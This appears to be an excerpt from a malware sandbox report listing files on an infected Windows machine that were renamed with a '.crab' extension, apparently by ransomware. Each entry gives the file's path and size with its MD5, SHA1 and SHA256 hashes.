SHA256: af17c4dfa0c09d85279d234f043dddb37ab3c07745e942bfc23feff435e622e6
False
c:\system volume information\spp\onlinemetadatacache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_ondisksnapshotprop.crab 3.23 KB MD5: 90c6a691d807188bcdb3cbe6fc0b8632
SHA1: 11d2e9c870a11695e951c5673db2b83f7b5937d2
SHA256: 7d5e4a0675802673cbdc8149cab7cd72eef4c5b94d1e4388f3e843124ff4e59d
False
c:\system volume information\spp\onlinemetadatacache\{8002c55b-b05c-402e-b80d-41cead61f984}_ondisksnapshotprop.crab 3.79 KB MD5: 5368d37774c586a49b18082b4a824976
SHA1: a5bd0afd77730e591f44a5e7ddd1cb5519cd5712
SHA256: 84ff4c8539d00e37171890d5d24cf6707d361ac3fdad30adaeed4fb0fdd2f846
False
c:\system volume information\spp\onlinemetadatacache\{9069688d-befb-4294-b8a6-15447e1f812d}_ondisksnapshotprop.crab 1.43 KB MD5: ed20e28c67b2fa1182f795a493b48dbc
SHA1: 83db7ed57cee960a34320b3fe4f334073d1ade14
SHA256: fc42927488ab6bd0e446e254bf5a36b59b560392e10e6c94446e192aa1ca1c9f
False
c:\system volume information\spp\onlinemetadatacache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_ondisksnapshotprop.crab 3.84 KB MD5: c7c0c4e49d347fc84de67173428575ca
SHA1: 5c24a08d6c6a76e11d37581504050bf0aa301bff
SHA256: 04c4a47184fafca9f3d10d26a01bf5da65f11ac4839c1fb764613d7e7d7d071a
False
c:\system volume information\spp\onlinemetadatacache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_ondisksnapshotprop.crab 3.55 KB MD5: cc0ec8691e5b290695dc899f78c3f5fd
SHA1: 920f59e60abc7d8fc3ad36b6badd718658bc4058
SHA256: 471bbc9698c602ceb3ce7c86fbd1d6b717460b870befa0d850c2d56373f03388
False
c:\system volume information\spp\onlinemetadatacache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_ondisksnapshotprop.crab 3.95 KB MD5: 1f474232564b1d7f72496ec63d63afb9
SHA1: d1892e1173f98d69a53aafb9f9ba7095a48faed3
SHA256: b4bd14ee62907763fd29c680204f21ab249a146798df492ddbffdf8e681577f5
False
c:\system volume information\spp\onlinemetadatacache\{c3f59859-dd84-4710-b6be-740f016ad023}_ondisksnapshotprop.crab 4.04 KB MD5: 36148c24039582fab4559d59e27c66c2
SHA1: 32506f24e6c3a2e8b421dac12e1b2fcf4b9c6bbe
SHA256: 5620141a0c06a3f52872a41149ff088b76801975d8c4c9a737d9a0d146c1537a
False
c:\system volume information\spp\onlinemetadatacache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_ondisksnapshotprop.crab 1.96 KB MD5: 646426473683121cd785a1c7ef1243b2
SHA1: 5ebb0dee0584828f19cee95a972c5ee606e53001
SHA256: fb3c8b93a6c843be580f6a595d10381a61b080d8ab719b7295498f2a970e88b8
False
c:\system volume information\spp\onlinemetadatacache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_ondisksnapshotprop.crab 3.46 KB MD5: 6d7c77de89891c46ecb49e928edc4e98
SHA1: c9921fbc9b5fe89381699def02f4c966a9e2f42f
SHA256: fe42ac8da8158c4008db9505bce3ca6fca23512b761161568d39c6f991add957
False
c:\system volume information\spp\onlinemetadatacache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_ondisksnapshotprop.crab 4.04 KB MD5: ae4b784eabeafa53cbe40b04e4d2e6cd
SHA1: 842874b93af04e1ef182699eaebfb2db1bf9a613
SHA256: fa9190f21848396107fe3fc8678866e22bda98d2e1bbcf81c8094d27a3dc48e7
False
c:\system volume information\spp\onlinemetadatacache\{dbab67da-647a-401e-a02b-58c06249c638}_ondisksnapshotprop.crab 3.74 KB MD5: 78c3e1c04362b9821f586eef8ce96a0a
SHA1: c68d40f86c357191a4ab0a81331e9091a719867d
SHA256: 2e303407dae1eab073b8613b3a23f5928c28128d535586a309ae54ffc5a4ab23
False
c:\system volume information\spp\onlinemetadatacache\{ee224d27-954d-4040-87c6-066b5517487c}_ondisksnapshotprop.crab 1.84 KB MD5: 2dfeefae7e2dc11e9e98b16407601fe7
SHA1: b549c3feebf9868e2793772037b2280a80ff3fa1
SHA256: 2ecd6c8882c129f9561cacc1f15062401490671c7845b2ed0aca2f97d6eed08f
False
c:\system volume information\spp\sppgroupcache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_driverpackageinfo.crab 55.57 KB MD5: 4d0864f478da72580b95358e7051489e
SHA1: cdcbcb67007517543104ff03ede8db945a600d6d
SHA256: 75eaf0a09c9748dbdbd46448b39667b06523fbf13772d845b992f9afa3f8df1e
False
c:\system volume information\spp\sppgroupcache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_windowsupdateinfo.crab 0.77 KB MD5: 155badf7b90787f363a5ef93b2176851
SHA1: 2527e993fd45362c70e812800d2a6c719a5d3e7b
SHA256: 9d2f9d72572c8221f1d22c178facf038f10398e80d9fe39fe9f822f6270ad00a
False
c:\system volume information\spp\sppgroupcache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_driverpackageinfo.crab 55.57 KB MD5: 37ccfd2610b40c8fbc4d79b118a16164
SHA1: 7bcc7a85daf2b76c0991eb19022cd460e755d362
SHA256: a732568dfbecd59e3a138c4d107c5714de3e62bde268dffe897c638edbb32d41
False
c:\system volume information\spp\sppgroupcache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_windowsupdateinfo.crab 0.77 KB MD5: 1bb24c2ff4afa3b43a7be6d34f2e38a6
SHA1: 6e5087d519048bf86b009db4d041e6f3d00e510c
SHA256: 935c60492df40f9b79aa56adf866fd9c885198cbacecea2406f78776079bfeca
False
c:\system volume information\spp\sppgroupcache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_driverpackageinfo.crab 55.57 KB MD5: 558702ece22fad5a66fab601f5d0d720
SHA1: f1fbaabcfc6cfaceb34182f6f55a5c6f6bb56174
SHA256: 4f62c75bcca5c97be8b83394d955be8cd6a5f916bcfb25ca77a84c7f7d5eca8a
False
c:\system volume information\spp\sppgroupcache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_windowsupdateinfo.crab 0.93 KB MD5: 12a3010cd25aaca20814483449170917
SHA1: d99fd37b7e2a6d1426ec00714bffaf08be8796bc
SHA256: 54f0aa32c1fbb8ed214c144a09e014d938c0772229b869e4fac4000d7ea618a3
False
c:\system volume information\spp\sppgroupcache\{29088c66-de5f-456f-85c0-6e4156f94358}_driverpackageinfo.crab 55.57 KB MD5: c776033df67dc57b104fcce49cfd4687
SHA1: be07cdb7ea02e9d3e327c585478aa447e52edec6
SHA256: 0f3f4c87330e7d215f1aa20470ee015ec468185e5b2c5704abfdabb580d84caf
False
c:\system volume information\spp\sppgroupcache\{29088c66-de5f-456f-85c0-6e4156f94358}_windowsupdateinfo.crab 0.93 KB MD5: 2ac19e9d6ae2bd7aefd449d014b3cc2a
SHA1: 829db42ae6476add9681bc70bd76b930c60af064
SHA256: 4b02c10cb7dd38c3b7e941f18fd176635453cc617055dfd3dd8c313d8991b6f4
False
c:\system volume information\spp\sppgroupcache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_driverpackageinfo.crab 55.57 KB MD5: 81b5360b3becb75c5bc01912b2ce3188
SHA1: 0007da4d775acc177c1621d1a9504c737181c2aa
SHA256: 146014c676af336c6bb7499d0fab793d7d787ecb6a7b9bb5059ca994f03ecd59
False
c:\system volume information\spp\sppgroupcache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_windowsupdateinfo.crab 0.93 KB MD5: e13f4a2303ad654544365c3fd900f8f1
SHA1: cef492647f07b1fe6218d8930da0378f791817fe
SHA256: 25034cd46cb5fdfea35a3b1d89ed17c57b22ba4e50ccd8059d05ec3179d5a32a
False
c:\system volume information\spp\sppgroupcache\{4204ee1b-0338-4788-b199-d83e4955faf1}_driverpackageinfo.crab 55.57 KB MD5: 540d368ef25e13454ce083ceed1c635a
SHA1: 4a5e42e677d72dae63a90155da7982306139a53e
SHA256: 294e0fce36f7f03b04815e8ac5a6d85e9f8d4061784efc639e49e7e32da47b15
False
c:\system volume information\spp\sppgroupcache\{4204ee1b-0338-4788-b199-d83e4955faf1}_windowsupdateinfo.crab 0.88 KB MD5: 1250dfbe50f8e11bb84b20ed060abefb
SHA1: 62cf31f356db6f9f017496aecd267a934357e6de
SHA256: f59643bfe08dffb2c9dd44f4349582ec2c1c6989814e2430f15c2c95a4c62958
False
c:\system volume information\spp\sppgroupcache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_driverpackageinfo.crab 55.57 KB MD5: 1ca5e90426a6bb86b2e0ea46eaf6805c
SHA1: 66478a65624052ba2d15179a5fe74828f600540f
SHA256: 7c8e9652b82833cd4869acc2d66392fc2cf3d31e0d63e43fad6bd538547fd10a
False
c:\system volume information\spp\sppgroupcache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_windowsupdateinfo.crab 0.77 KB MD5: 1c6b35df9a98a71d369b0bf9ed9d4992
SHA1: 354153110d212c66456e58cbb19895cfd28cce02
SHA256: d64cb634bf935ad6578120daada2aa3d9b403c8c74afd63bd036371b554a3508
False
c:\system volume information\spp\sppgroupcache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_driverpackageinfo.crab 55.57 KB MD5: 720a71a79cf4b48fab2d17a505a0ebca
SHA1: f3daf13d320e09a334b35f504ed3d55f76904f48
SHA256: db966c3643db55010c21fa56435d35bcd837bbd58ac25150e54b72d4a3fb5c7f
False
c:\system volume information\spp\sppgroupcache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_windowsupdateinfo.crab 0.77 KB MD5: 466d3115c2f76b5f3aabd40f948f91b9
SHA1: 126bd4258239fa275a99b8ebd6cbabd82c0db981
SHA256: dc7bf2ef6b0f857edca215ee2f6814b0a15c67dcd2b5229896f027005e28de3d
False
c:\system volume information\spp\sppgroupcache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_driverpackageinfo.crab 55.57 KB MD5: 52dd59a8fbe97826568e69d9dd43aaa2
SHA1: a1afdf07101db620e68bc2505db5ffb10f18c3a9
SHA256: 0b98ab7ecd8e1f90d9df89775307fcd165d87afe6a07825d85847777e80ba32f
False
c:\system volume information\spp\sppgroupcache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_windowsupdateinfo.crab 0.77 KB MD5: fd2195643f5e2d61252d11dcad451635
SHA1: a5b6e0f054d190ce02d0525919022a6b15da98cc
SHA256: 65faaaa2819cdf9838fafe3f70fab0f372f8044cce1405e6eb542db38f112880
False
c:\system volume information\spp\sppgroupcache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_driverpackageinfo.crab 55.57 KB MD5: df6b7b9247faa2bca752936664984839
SHA1: 3c752d279b9322c99d70133edd715acf66ea2403
SHA256: 7f4b816179576bf158dbf9b5d18974fb7ae3058cef94685b0da37bb2addf8a4b
False
c:\system volume information\spp\sppgroupcache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_windowsupdateinfo.crab 0.93 KB MD5: 67baccae601bf108e3715feaf7763755
SHA1: 2c0c3933bd63c8b66f15248a08b241e5a6b95b90
SHA256: 1ce58e60e5d503eded6cf06148f36be5cdf0ad035f63799e330e830504d496d4
False
c:\system volume information\spp\sppgroupcache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_driverpackageinfo.crab 55.57 KB MD5: dd203c350d3910f1a5c00c4e07a33442
SHA1: 04838c1c91630a51757ee3b05e9b679b1befcd91
SHA256: 4e5a1150dd0732a3f78474c88e233fecf21d711ba3539f447d82c223cb47fc86
False
c:\system volume information\spp\sppgroupcache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_windowsupdateinfo.crab 0.93 KB MD5: a875ee7a645f602ab06c164a5edb3bb7
SHA1: 60b9604b8c0276cf98803d168aa304b90eebfe62
SHA256: 0266967b19782323f1cc957a5becb73a71c837befe7c84632e84c73f3c5618d8
False
c:\system volume information\spp\sppgroupcache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_driverpackageinfo.crab 55.57 KB MD5: 9882fc1e1d1270e2b22f49ec9374283d
SHA1: f537ff73ad678dcb4f343a55844fa062f6d3a42d
SHA256: c4fd916129d6772d18065327c4ebd9b0e8c22f228a2766ebbbc0f3956694740c
False
c:\system volume information\spp\sppgroupcache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_windowsupdateinfo.crab 0.77 KB MD5: f531d6bd0697cbc5b01972da953280a1
SHA1: e71ca4fc81f76c198b1ef852e5204c24fdd677af
SHA256: d6dee793c84a4e1c58d049d950f057689ad856b3826e5ee2e002bcac344b2420
False
c:\system volume information\spp\sppgroupcache\{8002c55b-b05c-402e-b80d-41cead61f984}_driverpackageinfo.crab 55.57 KB MD5: 682c12c3e355394b1324e6cee47ec85c
SHA1: 81ba2cbfc77e4f7ac4b98832fe6c35274e52299f
SHA256: 6e5263229b5ddebb30d87e7aac7cc07bd519d73d80cae13e4816202d3025e415
False
c:\system volume information\spp\sppgroupcache\{8002c55b-b05c-402e-b80d-41cead61f984}_windowsupdateinfo.crab 0.93 KB MD5: ab1a0b67aa29b31aa94d3c0b4b2fdd79
SHA1: 75ecbbbc826de0171567b26a5650f830add7c7ff
SHA256: a796b1eed72f8fb60d52864b0347ab8b7d2c793fd7f384294539ce26df380b8d
False
c:\system volume information\spp\sppgroupcache\{9069688d-befb-4294-b8a6-15447e1f812d}_driverpackageinfo.crab 55.57 KB MD5: 092a106b90d25f8379b23d33276f2a86
SHA1: 28e9cba1f100267b30c33181e9354b6069f582a4
SHA256: 5bd678cd31b731da6c9eaf2cae5d783d8de97c60bfa39d4eeb47cfe4b4191b64
False
c:\system volume information\spp\sppgroupcache\{9069688d-befb-4294-b8a6-15447e1f812d}_windowsupdateinfo.crab 0.77 KB MD5: b45ef8489ee6598f065628bfce3698f6
SHA1: 21eaf84c1960a45e19d438055708a26edbe01d4b
SHA256: c67b8f8cee729911829afd57015197a4e4d62c43e6b597bd922c6bc9e597e3c0
False
c:\system volume information\spp\sppgroupcache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_driverpackageinfo.crab 55.57 KB MD5: 6db47c008f840894e0cad7e9241adfc7
SHA1: 2e5c6488404ef793aabc79eecf127d0fedd93e0a
SHA256: 3d908ab1f94ee09efb092da44ec06db281370e19d5e34685276b2402c5295fe2
False
c:\system volume information\spp\sppgroupcache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_windowsupdateinfo.crab 0.93 KB MD5: 399a040dadb9cdc998b32757726a8d2a
SHA1: e537f2d97bf4bb5b4763312219ae35d00fe25a31
SHA256: 50d19d47a8be0852bd99d3c91d696fb3f0d30e1f8c25a12510cd52cf3108e5df
False
c:\system volume information\spp\sppgroupcache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_driverpackageinfo.crab 55.57 KB MD5: 8040ba6cfa273638c4f03cc97fbcd103
SHA1: 376b31578f91d48c0d59078126fe7d2d79b6c6ca
SHA256: c98f2bb8785e0d70614c83def9b47bd4f3c1f8685f8aeb730d2916ba3070ba83
False
c:\system volume information\spp\sppgroupcache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_windowsupdateinfo.crab 0.88 KB MD5: 68fbfc3565a2a595b36099908ed1741d
SHA1: a12edd4d155f4748662131a7d09f63c1ecdbcbc8
SHA256: e04cd76089c571995233867f6d4ce80c53ec0c50ccb833eeeed6178708d84e6e
False
c:\system volume information\spp\sppgroupcache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_driverpackageinfo.crab 55.57 KB MD5: ad8631245cda3d5cde5375b9369ef746
SHA1: b7ab2531794bc36bb7ff5ca2c8c0549d7601e9ca
SHA256: 7e92e5c38f481c5a4a9291196fb8e6c68bee0e37265273782077f888e4013c0e
False
c:\system volume information\spp\sppgroupcache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_windowsupdateinfo.crab 0.93 KB MD5: ff5f25c5b88da62ca61a5de87e3286d7
SHA1: 767c4ad72b6946feec3d8e0b276ba32982fab4bb
SHA256: 8267bda13d6a59b397aab310813a670bbeed6fa96dab509e5383b0bd63c0ebce
False
c:\system volume information\spp\sppgroupcache\{c3f59859-dd84-4710-b6be-740f016ad023}_driverpackageinfo.crab 55.57 KB MD5: ba71d45188f1caf42398568b9746d4bd
SHA1: 4ac98cda6b1406c5e1159af8b5eee8c5dc6c119b
SHA256: 8655a9a710c85b26d981a57cea1bb18680b33fef777a3512618ec706d990d63b
False
c:\system volume information\spp\sppgroupcache\{c3f59859-dd84-4710-b6be-740f016ad023}_windowsupdateinfo.crab 0.93 KB MD5: fbfd425cf3eaff80f254902fd2af5d2d
SHA1: 7f3adbc202689a6c04f0f92eda9da510fdd38bf7
SHA256: f1c6765b22f3196114e3c173035ffa7dd43add3d4e11c2f760681566d2ea951f
False
c:\system volume information\spp\sppgroupcache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_driverpackageinfo.crab 55.57 KB MD5: bff0f0e4e051c16d7946a931cd023451
SHA1: ebe86e831b11eff0f8b9925a9a41151c889dcd50
SHA256: d5add29d6252e3ffb2512c64379c289cac725823fad9ef010690c5246f4f6e01
False
c:\system volume information\spp\sppgroupcache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_windowsupdateinfo.crab 0.77 KB MD5: 75ae51fbd84b6435525ab7a42b17fcf8
SHA1: 66ed00f0666f62babd4f02868b5a31b1325a71c6
SHA256: cfd172d60a3a7675317d5df0ae79b398cbe0e2ac674db0b23b1744ba75cfd361
False
c:\system volume information\spp\sppgroupcache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_driverpackageinfo.crab 55.57 KB MD5: 1c00067d6f774e3a337fd050240b17fe
SHA1: 199bfeaf471a28f5728db28e65ba1bc5f35844cf
SHA256: cf4a3c1a0e4933a303cf9a6f6523e7c8a33dc3432e2dc7c4f430ddd62985e933
False
c:\system volume information\spp\sppgroupcache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_windowsupdateinfo.crab 0.77 KB MD5: a809c8e30c3dcc1122bc79b9f8940896
SHA1: d275b417e99b03be1ec3a581b823fb6ac46febbc
SHA256: 035b39b0f816b0d70ddab0c6fe4d74900e1e60fbb94de9d5c25c5c9b13bd0b03
False
c:\system volume information\spp\sppgroupcache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_driverpackageinfo.crab 55.57 KB MD5: 305d08c4005b0124d2887e66c15c3a3c
SHA1: 106f10df354c4f877e1fed2e7be63baee65ee024
SHA256: d94bf92b581ea1af512b6ff77411b7b364a16346f150320d85e46881e84ce69e
False
c:\system volume information\spp\sppgroupcache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_windowsupdateinfo.crab 0.93 KB MD5: b0410d534a02bd82c61f6195328caba4
SHA1: 3249c4cb685ea215d45c4a54214c1ab28c7dd737
SHA256: b99cb56bdc728eb9f92f42b5b1b12d7b99669422d439c5c7246948d6aef2c24e
False
c:\system volume information\spp\sppgroupcache\{dbab67da-647a-401e-a02b-58c06249c638}_driverpackageinfo.crab 55.57 KB MD5: fae52d84fdd0e581c80928adf3ce6352
SHA1: a50eabd337316b2431dfdc9f61b1eaf80daa2285
SHA256: d333cbad4c7475bc8f1f142e3afdfc44e0029ff8b7b53c81e760d681ba64309a
False
c:\system volume information\spp\sppgroupcache\{dbab67da-647a-401e-a02b-58c06249c638}_windowsupdateinfo.crab 0.93 KB MD5: 0d824cd39e767cddf5339299f89f7f29
SHA1: a87fe3a38fa5e131392e8cec96ee056b82d67fc1
SHA256: f55400a7cc2457cc1943c6d15c3852a0f97c8b59ad126907e01a31010ba8963e
False
c:\system volume information\spp\sppgroupcache\{ee224d27-954d-4040-87c6-066b5517487c}_driverpackageinfo.crab 55.57 KB MD5: c80366540a3ce8868e783b9732812eb2
SHA1: 84b227834e1dc0354ef5aa98b5625475d3f52f28
SHA256: a980f73c5af94dfd1d2ed6667595b1622a4be057812404ad6f4e861ff7243790
False
c:\system volume information\spp\sppgroupcache\{ee224d27-954d-4040-87c6-066b5517487c}_windowsupdateinfo.crab 0.77 KB MD5: 2176c9534c3658366c29ce8e7e669ef1
SHA1: ef58e1c8812d262a803df697e60af4a0cd23adba
SHA256: a4fd38df834a091d73f2c0b6b45272b546e742c48f1fbcd9e2ed2ab7c398efac
False
c:\system volume information\syscache.hve.crab 256.51 KB MD5: 4eedecb1129348b7aa54be9feb25e001
SHA1: 42f53dbfe25ad3c9086da2ef085608f01447bcb9
SHA256: 02ff7a6013a126fa0292380aeb18f851f592332eca3b51d47cf177f0122cb9c3
False
c:\system volume information\syscache.hve.log1.crab 41.51 KB MD5: 3138483f79f8f0b1853a6c9c1def91a1
SHA1: dc57e805679fb3ded2553bac13c165c0033249fb
SHA256: e394a2794a3d6776b6b17750796091f464db0ffa5d061a1d40ce5040f3ac35d7
False
c:\system volume information\tracking.log.crab 20.51 KB MD5: fdf8183d0df49ae11ef35a19cd314f97
SHA1: 9bad5cee673d2ab98b1521d4596d9115b0f69797
SHA256: c744d415f0d063f365b74e350bd540956ae1a22b9bdd33f67f468a1da0de0201
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\2-qs7qkxl_g.mp3.crab 84.98 KB MD5: 7648fda1318782245c3000a23d3a4e4d
SHA1: 5fd6c0ed10aa459795a165881b022b01558ba38e
SHA256: 7deebde919541c097676883e4d587255e356ea85d9127c67a5cd28cafa7db384
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\5brnm_4g.avi.crab 40.91 KB MD5: 36b5ca358e8850b1d302ac83b7f0de6f
SHA1: 5cbe222906a8d1bd42e89f064ca6a3c5b34458c1
SHA256: 721d782e6a672bc38268e730561dde7db781bed4fd5d6a9dc5e4976e90a97f7b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\6ttzabrupckj.mp3.crab 30.82 KB MD5: 6adc244d57503abb563bf4b6a78106b7
SHA1: cd455aaba109eb3e97a2708ae46324e4aece4627
SHA256: d4a99205a66c225a308c0963a4b03ca3f83344ea2b828a9ba0c1455a644b6b69
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\8l7q06ltven.m4a.crab 54.15 KB MD5: 69613e9d0ef63b1b1ae07e6b1bc70222
SHA1: 54655345f5ba50a87a75e7eb6cbc3859b0b1511f
SHA256: 6e70d082a29eb845514ce753cc1f4c9098ee4b6f5fd502bbcc14a1a5cb5e9f38
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.settings.js.crab 0.52 KB MD5: c8dd7e9045270143a693ada15e4ba384
SHA1: de6c345f12b1fe68f8519adec8134eebd6961c80
SHA256: 60e780e8f953db7f8b2a35d46c3ef7f3b4732d410c474eab8dbc7841fe9436bd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab 5.79 KB MD5: 7e7db7050a480dc03810ac568568b564
SHA1: d1a6949e3435b62bf98b91bbbdcd45dd97dbaa6e
SHA256: 76520457b9c80cc7f253bd65e3680cfd34748dfbd41f7ab4de84483dd8bb1994
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab 1.43 KB MD5: 2f5f6bdf08960e1752237ea567a3a844
SHA1: 286d00bd49f25c60d71e1f75890bb79312a2e01a
SHA256: 33459fbf6278ffe25f396b48b8d9e08769c3129ca401b1365002e6ba56d68164
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab 37.34 KB MD5: dd98ff3b9ca1df07014e724a88dc33c4
SHA1: cef33772573649d1004236dd69165a41f7c89dfe
SHA256: 75977431a49d5a97f013275f3654d699aceb6b65c664c6921caf328dc7d9469a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\c-kxv0pbgc_miabaao14.mkv.crab 55.51 KB MD5: 1ddaf1c224d150b78f4d410b853301df
SHA1: 04da0f59c2a5306d096b752250d0369310aafe33
SHA256: 77ebaa3779e12c2032fd12e628d56e23158bea921e8a813f2cfb0a17c4b6e5cc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ccv_ue4.xls.crab 16.93 KB MD5: 8b5efee88d745a69fb363c94ae8b0b6a
SHA1: 55145910b36e3fbb6e154233bd15b002a3238d49
SHA256: 67bf484b2f49551636f52a3f01a304698253715ceb228ae9e04eabaaa32a7f21
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\e8zgiu 7wump.avi.crab 71.24 KB MD5: b75c2c3d255b7ed1dd720e318394bca8
SHA1: 4f12b784c64f9ac87e749a294ea15ab38c248410
SHA256: 0bc0d45c1e5b0979952a2f9d7ef13a1c9332e1014e41d564c52a97a288422392
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\efealxa3rfh.gif.crab 15.63 KB MD5: 9fad86406cf9541259cc38cb6b9fd8d2
SHA1: 70b498dbb8cef523fcd77ff005808a39c5202d6b
SHA256: be242fd7159346489c2dfa2eaef62229a571518245fcfb5e3fca1ef3adb17843
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\fkv-4yt.avi.crab 53.62 KB MD5: 310311b0e07f23bebbd9139317eee69c
SHA1: e938857ce1b787a77bbef84d4ba664b2a7cd8681
SHA256: 77e7c98cedb2cd38f0fc67db0297e7a283c4e002767547a4abecfecec6fe940e
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\h1ocpap4n8fgc.swf.crab 43.32 KB MD5: 02ba599943fc69c06fd2b70df06e5eb3
SHA1: 4995d4fdf89d06d3b06a8359ad534ec3daeac21b
SHA256: 6cbad101df2bdbb45443825d72cb62774eddbcf32960de518615d9da9d00bdd1
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hjl6.odp.crab 34.15 KB MD5: c0087c11ec83643395b1c51c27e7e31a
SHA1: e3cd618f7edf2b0893d80db60ae8333910342ae4
SHA256: 981d9ff82c45c9b74e938d312eada6bd52b167bf734165cced944107bcc16644
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hjwxsmbu5av_b.flv.crab 53.49 KB MD5: cb05f96aecb72709efa37d0e0b7ea9e8
SHA1: db5c5eaf4a3169457e8ccc3cc752b23d47b55a0a
SHA256: 311907423932d0de4e018a31f678d3c580289705ba4891d92519b51c141ed6bd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hm9gacaxvusm8zhpocg7.avi.crab 100.12 KB MD5: 782716c31f1b4631b41093fe7e2b8613
SHA1: 4778907ee7af176f2e1d9853713d35c48b32c079
SHA256: 9a40ca9649ce37513e79b492bd63a98e877fefb019928200f3abd025d030780f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\httpvnvqonavjdlxebf.gif.crab 65.10 KB MD5: 88442769483abecab4e5fabc28740b82
SHA1: 79a568506e35f48c392b14043f10e6170dd38d17
SHA256: b54978b7c4fa20ce4a314a56bea0d13ac1646acc23fe8814ecd2e8fb44811589
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\judrea4jdibkj.mp4.crab 62.30 KB MD5: 52fbd86b8c5e9b14c5b66a736260aa5c
SHA1: 6f0c8b37582ed3b4eb05f187e8d94a77ee4e7ecc
SHA256: 543557a813bd7e82aea7a935498084babb4fa7000fba2699bbbd183f4be60de4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\lahy.m4a.crab 63.93 KB MD5: 98902ee92243b69bd467637f6877e495
SHA1: de33787e391d09c700eaeacc60ed4780b63bdb01
SHA256: 2bd07cfeda337c1d3c0610cd74f0463e3f802ddac6b04e71b4b89ae07e2123ca
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 0.98 KB MD5: f6333e579f6f836c123693a68d995605
SHA1: e7bed8b03714d7823445cd03b8904b5b9dd67a23
SHA256: c46dd910b818cb31e19854d3a3f122448b48f4ae1ab18c033fc0edb61403a7de
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.55 KB MD5: e99a9edab8b29813de14af6b1e27c8a4
SHA1: 117846b32f99dd3dab808efc09511735ea537101
SHA256: d2305c8158b48e6e44291c3335826cf10b454124e9659e701c8653e9b8f05995
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.60 KB MD5: dbf521dcf262c910892dcc8bffb3f718
SHA1: 1ffe032837091cbc61e1d6922a347e3a252b3a50
SHA256: a16a2aa06b25d6b97613bb07588ea396517421fa8eecb7be59f01f2b9e01d038
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.57 KB MD5: 119c2713d08bfcfb9ccd760b83415d1d
SHA1: 8202232e6be763fa2c9717cd8f83a7eb20755bd5
SHA256: 400d0c5f32836eed6d4000f5c0a5452a07f9ad9c8b9c8f9c0548955bfdaa8879
False
